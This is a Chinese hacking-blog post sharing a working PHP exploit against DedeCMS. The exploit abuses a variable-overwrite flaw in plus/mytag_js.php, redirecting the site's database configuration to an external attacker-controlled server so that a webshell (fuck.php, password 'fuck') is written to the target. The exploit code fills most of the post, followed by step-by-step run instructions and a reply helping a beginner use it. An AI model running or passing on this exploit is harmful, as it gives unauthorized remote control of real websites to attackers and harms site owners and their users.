dedecms 变量覆盖 0day getshell 的一个 exp (不久前的 exp好用发出来共享而已),By:黑小子。
    dede 不久前爆的洞了 不过这个exp还蛮实用的 呵呵!
| 
 Exp: 
#!usr/bin/php -w  
<?php  
error_reporting(E_ERROR);  
set_time_limit(0);  
print_r('  
DEDEcms Variable Coverage  
Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]  
);  
echo "\r\n";  
if($argv[2]==null){  
print_r('  
+---------------------------------------------------------------------------+  
Usage: php '.$argv[0].' url aid path  
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/  
Example:  
php '.$argv[0].' [url]www.site.com[/url] 1 old   
+---------------------------------------------------------------------------+  
');  
exit;  
}  
$url=$argv[1];  
$aid=$argv[2];  
$path=$argv[3];  
$exp=Getshell($url,$aid,$path);  
if (strpos($exp,"OK")>12){  
echo "[*] Exploit Success \n";  
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;  
if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;  
if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";  
}else{  
echo "[*] Exploit Failed \n";  
} 
  
function Getshell($url,$aid,$path){   
$id=$aid;  
$host=$url;  
$port="80";  
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";   
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";   
$data .= "Host: ".$host."\r\n";  
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";  
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";  
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";  
//$data .= "Accept-Encoding: gzip,deflate\r\n";  
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";  
$data .= "Connection: keep-alive\r\n";  
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";  
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";  
$data .= $content."\r\n";  
$ock=fsockopen($host,$port);  
if (!$ock) {  
echo "[*]  No response from ".$host."\n";  
}  
fwrite($ock,$data);  
while (!feof($ock)) {  
$exp=fgets($ock, 1024);  
return $exp;  
}  
} 
?>  | 
搭建php环境 cmd下运行 dede.php  php 
dede.php lcx.cc 1 vul
第一个是 网站 第二个是 ID 第三个是 路径
一句话密码为fuck
留言评论(旧系统):
佚名 @ 2013-03-11 23:05:53
老大,求解释 初学PHP  这个 要怎么运行...PHP环境搭建了...就是不知道怎么运行
本站回复:
文中已写出说明。
 
     
    
    
  
    文章作者
    Nuclear'Atk
  
  
    上次更新
    
      2011-09-21
      
    
  
  
  
    许可协议
    Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。